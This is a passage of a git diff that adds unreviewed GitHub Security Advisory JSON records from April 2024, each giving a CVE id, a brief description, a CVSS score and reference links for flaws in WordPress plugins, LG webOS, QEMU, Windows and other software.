"https://github.com/Leantime/leantime/blob/264a7dbc2c9b18f574821bf27dd568a287ee8498/app/Domain/Users/Controllers/NewUser.php#L16" + }, + { + "type": "WEB", + "url": "https://github.com/dead1nfluence/Leantime-POC/blob/main/README.md" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T15:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-rg68-wq7j-fhjx/GHSA-rg68-wq7j-fhjx.json b/advisories/unreviewed/2024/04/GHSA-rg68-wq7j-fhjx/GHSA-rg68-wq7j-fhjx.json new file mode 100644 index 00000000000..f0086020a4b --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-rg68-wq7j-fhjx/GHSA-rg68-wq7j-fhjx.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rg68-wq7j-fhjx", + "modified": "2024-04-05T21:32:45Z", + "published": "2024-04-05T21:32:45Z", + "aliases": [ + "CVE-2024-27909" + ], + "details": "A denial of service vulnerability was reported in the HTTPS service of some Lenovo Printers that could result in a system reboot.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27909" + }, + { + "type": "WEB", + "url": "https://iknow.lenovo.com.cn/detail/420425" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-05T21:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-rgmh-52xq-8wg7/GHSA-rgmh-52xq-8wg7.json b/advisories/unreviewed/2024/04/GHSA-rgmh-52xq-8wg7/GHSA-rgmh-52xq-8wg7.json new file mode 100644 index 00000000000..a537e7cba5c --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-rgmh-52xq-8wg7/GHSA-rgmh-52xq-8wg7.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rgmh-52xq-8wg7", + "modified": "2024-04-07T09:30:29Z", + "published": "2024-04-07T09:30:29Z", + "aliases": [ + "CVE-2023-52715" + ], + "details": "The SystemUI module has a vulnerability in permission management.\nImpact: Successful exploitation of this vulnerability may affect availability.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52715" + }, + { + "type": "WEB", + "url": "https://consumer.huawei.com/en/support/bulletin/2024/4" + }, + { + "type": "WEB", + "url": "https://https://device.harmonyos.com/en/docs/security/update/security-bulletins-202404-0000001880501689" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-07T09:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-rgmx-cc87-595r/GHSA-rgmx-cc87-595r.json b/advisories/unreviewed/2024/04/GHSA-rgmx-cc87-595r/GHSA-rgmx-cc87-595r.json new file mode 100644 index 00000000000..64d590b9ebd --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-rgmx-cc87-595r/GHSA-rgmx-cc87-595r.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rgmx-cc87-595r", + "modified": "2024-04-09T18:30:26Z", + "published": "2024-04-09T18:30:26Z", + "aliases": [ + "CVE-2024-26233" + ], + "details": "Windows DNS Server Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26233" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26233" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-416" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:43Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-rgvf-j3x5-6277/GHSA-rgvf-j3x5-6277.json b/advisories/unreviewed/2024/04/GHSA-rgvf-j3x5-6277/GHSA-rgvf-j3x5-6277.json new file mode 100644 index 00000000000..d8f4ac1ac9d --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-rgvf-j3x5-6277/GHSA-rgvf-j3x5-6277.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rgvf-j3x5-6277", + "modified": "2024-04-09T21:32:00Z", + "published": "2024-04-09T21:32:00Z", + "aliases": [ + "CVE-2024-3446" + ], + "details": "A double free vulnerability was found in QEMU virtio devices (virtio-gpu, virtio-serial-bus, virtio-crypto), where the mem_reentrancy_guard flag insufficiently protects against DMA reentrancy issues. This issue could allow a malicious privileged guest to crash the QEMU process on the host, resulting in a denial of service or allow arbitrary code execution within the context of the QEMU process on the host.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3446" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2024-3446" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2274211" + }, + { + "type": "WEB", + "url": "https://patchew.org/QEMU/20240409105537.18308-1-philmd@linaro.org" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-415" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T20:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-rgwx-4v25-2mj5/GHSA-rgwx-4v25-2mj5.json b/advisories/unreviewed/2024/04/GHSA-rgwx-4v25-2mj5/GHSA-rgwx-4v25-2mj5.json new file mode 100644 index 00000000000..2bd0b25a5b5 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-rgwx-4v25-2mj5/GHSA-rgwx-4v25-2mj5.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rgwx-4v25-2mj5", + "modified": "2024-04-09T15:30:36Z", + "published": "2024-04-09T15:30:36Z", + "aliases": [ + "CVE-2023-6319" + ], + "details": "A command injection vulnerability exists in the getAudioMetadata method from the com.webos.service.attachedstoragemanager service on webOS version 4 through 7. A series of specially crafted requests can lead to command execution as the root user. An attacker can make authenticated requests to trigger this vulnerability.\n\n * webOS 4.9.7 - 5.30.40 running on LG43UM7000PLA \n\n * webOS 5.5.0 - 04.50.51 running on OLED55CXPUA \n\n * webOS 6.3.3-442 (kisscurl-kinglake) - 03.36.50 running on OLED48C1PUB \n\n * webOS 7.3.1-43 (mullet-mebin) - 03.33.85 running on OLED55A23LA\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6319" + }, + { + "type": "WEB", + "url": "https://bitdefender.com/blog/labs/vulnerabilities-identified-in-lg-webos" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T14:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-rgx7-8wqv-m224/GHSA-rgx7-8wqv-m224.json b/advisories/unreviewed/2024/04/GHSA-rgx7-8wqv-m224/GHSA-rgx7-8wqv-m224.json new file mode 100644 index 00000000000..6a309103b6c --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-rgx7-8wqv-m224/GHSA-rgx7-8wqv-m224.json @@ -0,0 +1,43 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rgx7-8wqv-m224", + "modified": "2024-04-08T18:30:48Z", + "published": "2024-04-08T18:30:48Z", + "aliases": [ + "CVE-2024-23082" + ], + "details": "ThreeTen Backport v1.6.8 was discovered to contain an integer overflow via the component org.threeten.bp.format.DateTimeFormatter::parse(CharSequence, ParsePosition).", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23082" + }, + { + "type": "WEB", + "url": "https://gist.github.com/LLM4IG/d2618f5f4e5ac37eb75cff5617e58b90" + }, + { + "type": "WEB", + "url": "https://github.com/ThreeTen/threetenbp" + }, + { + "type": "WEB", + "url": "http://threeten.com" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T18:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-rh4m-vg7c-86x5/GHSA-rh4m-vg7c-86x5.json b/advisories/unreviewed/2024/04/GHSA-rh4m-vg7c-86x5/GHSA-rh4m-vg7c-86x5.json new file mode 100644 index 00000000000..43344cfbe9c --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-rh4m-vg7c-86x5/GHSA-rh4m-vg7c-86x5.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rh4m-vg7c-86x5", + "modified": "2024-04-09T18:30:24Z", + "published": "2024-04-09T18:30:24Z", + "aliases": [ + "CVE-2024-26175" + ], + "details": "Secure Boot Security Feature Bypass Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26175" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26175" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-125" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-rh8m-cg7r-67h7/GHSA-rh8m-cg7r-67h7.json b/advisories/unreviewed/2024/04/GHSA-rh8m-cg7r-67h7/GHSA-rh8m-cg7r-67h7.json new file mode 100644 index 00000000000..2e73df39b62 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-rh8m-cg7r-67h7/GHSA-rh8m-cg7r-67h7.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rh8m-cg7r-67h7", + "modified": "2024-04-06T09:31:03Z", + "published": "2024-04-06T09:31:03Z", + "aliases": [ + "CVE-2024-2296" + ], + "details": "The Photo Gallery by 10Web – Mobile-Friendly Image Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG file uploads in all versions up to, and including, 1.8.21 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2296" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3058445%40photo-gallery&new=3058445%40photo-gallery&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/994a044d-db69-4f2d-9027-cf3665446ed3?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-06T09:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-rhg5-7x2m-pq53/GHSA-rhg5-7x2m-pq53.json b/advisories/unreviewed/2024/04/GHSA-rhg5-7x2m-pq53/GHSA-rhg5-7x2m-pq53.json new file mode 100644 index 00000000000..f4291eb8f44 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-rhg5-7x2m-pq53/GHSA-rhg5-7x2m-pq53.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rhg5-7x2m-pq53", + "modified": "2024-04-09T21:31:55Z", + "published": "2024-04-09T21:31:55Z", + "aliases": [ + "CVE-2022-4965" + ], + "details": "The Invitation Code Content Restriction Plugin from CreativeMinds plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘target_id’ parameter in all versions up to, and including, 1.5.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-4965" + }, + { + "type": "WEB", + "url": "https://www.cminds.com/changelog/?id=255" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d3d0f705-2458-4cc6-8730-997314084f24?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-rhxw-9g9h-jr2x/GHSA-rhxw-9g9h-jr2x.json b/advisories/unreviewed/2024/04/GHSA-rhxw-9g9h-jr2x/GHSA-rhxw-9g9h-jr2x.json new file mode 100644 index 00000000000..136a5ca4254 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-rhxw-9g9h-jr2x/GHSA-rhxw-9g9h-jr2x.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rhxw-9g9h-jr2x", + "modified": "2024-04-09T18:30:24Z", + "published": "2024-04-09T18:30:24Z", + "aliases": [ + "CVE-2024-20693" + ], + "details": "Windows Kernel Elevation of Privilege Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20693" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20693" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-426" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:33Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-rjmx-4pf7-6fpx/GHSA-rjmx-4pf7-6fpx.json b/advisories/unreviewed/2024/04/GHSA-rjmx-4pf7-6fpx/GHSA-rjmx-4pf7-6fpx.json new file mode 100644 index 00000000000..eb6c77cab1b --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-rjmx-4pf7-6fpx/GHSA-rjmx-4pf7-6fpx.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rjmx-4pf7-6fpx", + "modified": "2024-04-09T18:30:26Z", + "published": "2024-04-09T18:30:26Z", + "aliases": [ + "CVE-2024-26243" + ], + "details": "Windows USB Print Driver Elevation of Privilege Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26243" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26243" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-126" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:45Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-rm4x-93m8-4qcv/GHSA-rm4x-93m8-4qcv.json b/advisories/unreviewed/2024/04/GHSA-rm4x-93m8-4qcv/GHSA-rm4x-93m8-4qcv.json new file mode 100644 index 00000000000..09ba4dd0b86 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-rm4x-93m8-4qcv/GHSA-rm4x-93m8-4qcv.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rm4x-93m8-4qcv", + "modified": "2024-04-09T15:30:36Z", + "published": "2024-04-09T15:30:36Z", + "aliases": [ + "CVE-2023-6317" + ], + "details": "A prompt bypass exists in the secondscreen.gateway service running on webOS version 4 through 7. An attacker can create a privileged account without asking the user for the security PIN. \n\nFull versions and TV models affected:\n\nwebOS 4.9.7 - 5.30.40 running on LG43UM7000PLA \nwebOS 5.5.0 - 04.50.51 running on OLED55CXPUA \nwebOS 6.3.3-442 (kisscurl-kinglake) - 03.36.50 running on OLED48C1PUB  \nwebOS 7.3.1-43 (mullet-mebin) - 03.33.85 running on OLED55A23LA \n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6317" + }, + { + "type": "WEB", + "url": "https://bitdefender.com/blog/labs/vulnerabilities-identified-in-lg-webos" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-639" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T14:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-rm7r-xfxm-p2qm/GHSA-rm7r-xfxm-p2qm.json b/advisories/unreviewed/2024/04/GHSA-rm7r-xfxm-p2qm/GHSA-rm7r-xfxm-p2qm.json new file mode 100644 index 00000000000..cd840766dd5 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-rm7r-xfxm-p2qm/GHSA-rm7r-xfxm-p2qm.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rm7r-xfxm-p2qm", + "modified": "2024-04-09T18:30:25Z", + "published": "2024-04-09T18:30:25Z", + "aliases": [ + "CVE-2024-26193" + ], + "details": "Azure Migrate Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26193" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26193" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-285" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:37Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-rm8w-vp6f-85hq/GHSA-rm8w-vp6f-85hq.json b/advisories/unreviewed/2024/04/GHSA-rm8w-vp6f-85hq/GHSA-rm8w-vp6f-85hq.json new file mode 100644 index 00000000000..892cc481304 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-rm8w-vp6f-85hq/GHSA-rm8w-vp6f-85hq.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rm8w-vp6f-85hq", + "modified": "2024-04-10T15:30:38Z", + "published": "2024-04-10T15:30:38Z", + "aliases": [ + "CVE-2024-3531" + ], + "details": "A vulnerability was found in Campcodes Complete Online Student Management System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file courses_view.php. The manipulation of the argument FirstRecord leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-259901 was assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3531" + }, + { + "type": "WEB", + "url": "https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20Student%20Management%20System/Complete%20Online%20Student%20Management%20System%20-%20vuln%204.pdf" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259901" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259901" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.312522" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T02:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-rmmj-g3w6-w438/GHSA-rmmj-g3w6-w438.json b/advisories/unreviewed/2024/04/GHSA-rmmj-g3w6-w438/GHSA-rmmj-g3w6-w438.json new file mode 100644 index 00000000000..5ea8b9ed72c --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-rmmj-g3w6-w438/GHSA-rmmj-g3w6-w438.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rmmj-g3w6-w438", + "modified": "2024-04-08T03:30:52Z", + "published": "2024-04-08T03:30:52Z", + "aliases": [ + "CVE-2023-52352" + ], + "details": "In Network Adapter Service, there is a possible missing permission check. This could lead to local denial of service with no additional execution privileges needed", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52352" + }, + { + "type": "WEB", + "url": "https://www.unisoc.com/en_us/secy/announcementDetail/1777143682512781313" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T03:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-rpxx-wr6g-h998/GHSA-rpxx-wr6g-h998.json b/advisories/unreviewed/2024/04/GHSA-rpxx-wr6g-h998/GHSA-rpxx-wr6g-h998.json new file mode 100644 index 00000000000..98144e42b9e --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-rpxx-wr6g-h998/GHSA-rpxx-wr6g-h998.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rpxx-wr6g-h998", + "modified": "2024-04-08T15:30:32Z", + "published": "2024-04-08T15:30:32Z", + "aliases": [ + "CVE-2014-125111" + ], + "details": "A vulnerability was found in namithjawahar Wp-Insert up to 2.0.8 and classified as problematic. Affected by this issue is some unknown functionality. The manipulation leads to cross site scripting. The attack may be launched remotely. Upgrading to version 2.0.9 is able to address this issue. The name of the patch is a07b7b08084b9b85859f3968ce7fde0fd1fcbba3. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-259628.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-125111" + }, + { + "type": "WEB", + "url": "https://github.com/wp-plugins/wp-insert/commit/a07b7b08084b9b85859f3968ce7fde0fd1fcbba3" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259628" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259628" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T13:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-rq49-j5jp-7mr4/GHSA-rq49-j5jp-7mr4.json b/advisories/unreviewed/2024/04/GHSA-rq49-j5jp-7mr4/GHSA-rq49-j5jp-7mr4.json new file mode 100644 index 00000000000..295a493aa69 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-rq49-j5jp-7mr4/GHSA-rq49-j5jp-7mr4.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rq49-j5jp-7mr4", + "modified": "2024-04-07T09:30:29Z", + "published": "2024-04-07T09:30:29Z", + "aliases": [ + "CVE-2024-30418" + ], + "details": "Vulnerability of insufficient permission verification in the app management module.\nImpact: Successful exploitation of this vulnerability will affect availability.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30418" + }, + { + "type": "WEB", + "url": "https://consumer.huawei.com/en/support/bulletin/2024/4" + }, + { + "type": "WEB", + "url": "https://device.harmonyos.com/en/docs/security/update/security-bulletins-202404-0000001880501689" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-07T09:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-rqgg-9h2q-r225/GHSA-rqgg-9h2q-r225.json b/advisories/unreviewed/2024/04/GHSA-rqgg-9h2q-r225/GHSA-rqgg-9h2q-r225.json new file mode 100644 index 00000000000..6c049d915ae --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-rqgg-9h2q-r225/GHSA-rqgg-9h2q-r225.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rqgg-9h2q-r225", + "modified": "2024-04-06T03:30:26Z", + "published": "2024-04-06T03:30:26Z", + "aliases": [ + "CVE-2024-3245" + ], + "details": "The EmbedPress – Embed PDF, Google Docs, Vimeo, Wistia, Embed YouTube Videos, Audios, Maps & Embed Any Documents in Gutenberg & Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Youtube block in all versions up to, and including, 3.9.14 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3245" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3064544/embedpress/tags/3.9.15/Gutenberg/dist/blocks.build.js" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a427c798-f546-4ca1-98ab-32b433ee5b59?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-06T03:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-rqp6-4qqm-mqcw/GHSA-rqp6-4qqm-mqcw.json b/advisories/unreviewed/2024/04/GHSA-rqp6-4qqm-mqcw/GHSA-rqp6-4qqm-mqcw.json new file mode 100644 index 00000000000..4f8e60d7ffc --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-rqp6-4qqm-mqcw/GHSA-rqp6-4qqm-mqcw.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rqp6-4qqm-mqcw", + "modified": "2024-04-09T21:31:57Z", + "published": "2024-04-09T21:31:57Z", + "aliases": [ + "CVE-2024-1458" + ], + "details": "The Elementor Addons by Livemesh plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘text_alignment’ attribute of the Animated Text widget in all versions up to, and including, 8.3.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1458" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3048237/addons-for-elementor" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e28b78c3-c370-4076-836e-9f61acba064c?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:17Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-rr32-xpf4-hwj6/GHSA-rr32-xpf4-hwj6.json b/advisories/unreviewed/2024/04/GHSA-rr32-xpf4-hwj6/GHSA-rr32-xpf4-hwj6.json new file mode 100644 index 00000000000..13cca280d51 --- /dev/null +++ 